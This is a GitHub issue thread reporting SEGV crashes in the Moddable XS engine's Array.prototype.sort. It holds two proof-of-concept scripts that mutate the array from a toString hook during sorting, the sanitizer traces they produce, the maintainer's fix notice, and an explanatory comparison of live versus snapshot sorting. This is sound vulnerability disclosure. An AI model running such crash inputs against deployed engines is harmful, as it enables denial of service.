
SEGV xs/sources/xsArray.c:2237:7 in fx_Array_prototype_sort #766

Closed
hope-fly opened this issue Jan 7, 2022 · 3 comments
Labels: confirmed (issue reported has been reproduced); fixed - please verify (Issue has been fixed. Please verify and close.)

Comments

hope-fly commented Jan 7, 2022

Moddable-XS revision

Commit: 2f93df29

Version: 11.5.0 32 4

Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps
cd ~/moddable/xs/makefiles/lin
#debug
make -f xst.mk
Test case
poc.js

var size = 256;
var array1 = new Array(size);

// toString hook: shrinks array1 while the outer sort() is still iterating over it,
// then re-enters sort() from inside the callback
function toStr() {
  array1.splice(0, 2);
  return array1.sort().toString();
}

function JSEtest() {
  for (var i = 0; i < size; i++) {
    array1[i] = new Array(i);
    array1.sort()[i].toString = toStr;  // install the hook on an element of the sorted array
  }
  array1.sort();  // the default comparator stringifies elements, so toStr runs mid-sort
}

JSEtest();

Execution & Output
$ ./moddable/build/bin/lin/debug/xst poc.js

AddressSanitizer:DEADLYSIGNAL
=================================================================
==101668==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x00000057e1b4 bp 0x7ffe5dc36870 sp 0x7ffe5dc35840 T0)
==101668==The signal is caused by a READ memory access.
==101668==Hint: address points to the zero page.
    #0 0x57e1b3 in fx_Array_prototype_sort /root/moddable/xs/sources/xsArray.c:2237:7
    #1 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7
    #2 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4
    #3 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2
    #4 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8
    #5 0x7faf269ccbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #6 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsArray.c:2237:7 in fx_Array_prototype_sort
==101668==ABORTING

Credits: Found by OWL337 team.

@phoddie phoddie added the confirmed issue reported has been reproduced label Jan 8, 2022
hope-fly (Author) commented

When the test case is changed a little, there's a new crash during fuzzing. I'm not sure whether it's a duplicate issue or not.
If it's not, I'll open a new issue. Hope the info listed below will be helpful!

Test case
poc.js

var size = 1000;
var array1 = new Array(size);

// toString hook: shrinks array1 while the outer sort() is still iterating over it
// (no recursive sort() this time, only the mutation)
function toStr() {
    array1.splice(0, 2);
    return array1.toString();
}

function JSEtest() {
    for (var i = 0; i < size; i++) {
        array1[i] = new Array(i);
        array1.sort()[i].toString = toStr;  // install the hook on an element of the sorted array
    }
    array1.sort();  // the default comparator stringifies elements, so toStr runs mid-sort
}

JSEtest();

Execution & Output
$ ./moddable/build/bin/lin/debug/xst poc.js

AddressSanitizer:DEADLYSIGNAL
=================================================================
==39035==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000004c0 (pc 0x00000059c0a6 bp 0x7ffc9a80fa50 sp 0x7ffc9a80f730 T0)
==39035==The signal is caused by a READ memory access.
==39035==Hint: address points to the zero page.
    #0 0x59c0a5 in fxCompareArrayItem /home/f1yfuzz/moddable/xs/sources/xsArray.c:350:18
    #1 0x57dc9a in fx_Array_prototype_sort /home/f1yfuzz/moddable/xs/sources/xsArray.c:2235:14
    #2 0x84f3ca in fxRunID /home/f1yfuzz/moddable/xs/sources/xsRun.c:842:7
    #3 0x8ceaac in fxRunScript /home/f1yfuzz/moddable/xs/sources/xsRun.c:4766:4
    #4 0xad3231 in fxRunProgramFile /home/f1yfuzz/moddable/xs/tools/xst.c:1387:2
    #5 0xacfa83 in main /home/f1yfuzz/moddable/xs/tools/xst.c:281:8
    #6 0x7f8d44116bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    #7 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/f1yfuzz/moddable/xs/sources/xsArray.c:350:18 in fxCompareArrayItem
==39035==ABORTING

phoddie (Collaborator) commented Jan 13, 2022

Thanks! From a quick look, it is tough to say if these are the same cause or not – the tests and crash are quite similar but the crash is in a different place. We'll investigate and let you know.

phoddie (Collaborator) commented Feb 1, 2022

This has been resolved in our most recent Moddable SDK update. There were changes to Array sorting and a change to xst to ensure a clean exit when the JavaScript stack overflow is detected. Thank you again for the report.
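The hazard both test cases exercise is re-entrancy: the default sort comparator stringifies elements, so user code (here `toStr`) runs in the middle of the sort and shrinks the array the engine is still walking. The example below is an added illustration in plain JavaScript, not code from the Moddable SDK, this issue, or the actual fix (which is not shown on the page); every function name in it is hypothetical. It shows the same insertion sort applied two ways: directly over the live array, where a comparator that splices elements off leaves the sort reading slots that no longer exist (the JavaScript analogue of the engine's read from the zero page), and over a private snapshot that is written back afterwards, which is the discipline ECMA-262 specifies for `Array.prototype.sort` (collect the elements, sort the copy, write it back) and the reason a conforming engine must not hold a raw pointer into the array storage across a call into user code. The first report's recursive `sort()` call inside `toStr` (the stack-overflow path phoddie mentions) is not modelled here.

```javascript
// Added illustration (not Moddable SDK code): why a sort must not read the live
// array storage after calling user code. All names here are hypothetical.

// Insertion sort that reads `list` directly on every comparison. The length is
// captured once, the way a native implementation holds a raw pointer and count
// into the array's backing storage.
function insertionSort(list, compare) {
  const n = list.length;
  for (let i = 1; i < n; i++) {
    let j = i;
    while (j > 0 && compare(list[j - 1], list[j]) > 0) {
      const t = list[j - 1];
      list[j - 1] = list[j];
      list[j] = t;
      j--;
    }
  }
  return list;
}

// Unsafe: sorts the caller's array in place, so a comparator that shrinks the
// array leaves the sort reading slots that no longer exist.
function sortLive(arr, compare) {
  return insertionSort(arr, compare);
}

// Safe (the ECMA-262 SortIndexedProperties discipline): copy the elements out,
// sort the private copy, then write the result back. User code invoked by the
// comparator may mutate `arr` freely; the sort never touches it meanwhile.
function sortSnapshot(arr, compare) {
  const len = arr.length;
  const items = [];
  for (let k = 0; k < len; k++) {
    if (k in arr) items.push(arr[k]);   // holes are skipped, as the spec does
  }
  insertionSort(items, compare);
  for (let k = 0; k < items.length; k++) arr[k] = items[k];
  for (let k = items.length; k < len; k++) delete arr[k];
  return arr;
}

// Comparator that behaves like toStr() in the report: on its first call it
// splices two elements off the array being sorted, then compares normally.
function makeMutatingComparator(arr) {
  let fired = false;
  return (a, b) => {
    if (!fired) {
      fired = true;
      arr.splice(0, 2);
    }
    return a.v - b.v;   // throws TypeError if the sort handed us a vanished slot
  };
}

// Runs one strategy over a constructed sample array and reports the outcome.
function demo(strategy) {
  const arr = [3, 2, 1, 0].map(v => ({ v }));   // constructed sample input
  const compare = makeMutatingComparator(arr);
  try {
    strategy(arr, compare);
    return { error: null, values: arr.map(x => x.v) };
  } catch (e) {
    return { error: e.constructor.name, values: arr.map(x => (x ? x.v : null)) };
  }
}

console.log('live sort:    ', demo(sortLive));      // error: 'TypeError' (read past the shrunken array)
console.log('snapshot sort:', demo(sortSnapshot));  // error: null, values [0, 1, 2, 3]
```

Run it with `node` to see the two outcomes side by side. In a managed language the stale read surfaces as `undefined` and a `TypeError`; in a C engine the equivalent stale pointer is the SEGV in the sanitizer traces above, which is why the snapshot-and-write-back structure, rather than any bounds check on the live storage, is the robust design.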

@phoddie phoddie added the fixed - please verify Issue has been fixed. Please verify and close. label Feb 1, 2022
@phoddie phoddie closed this as completed Feb 9, 2022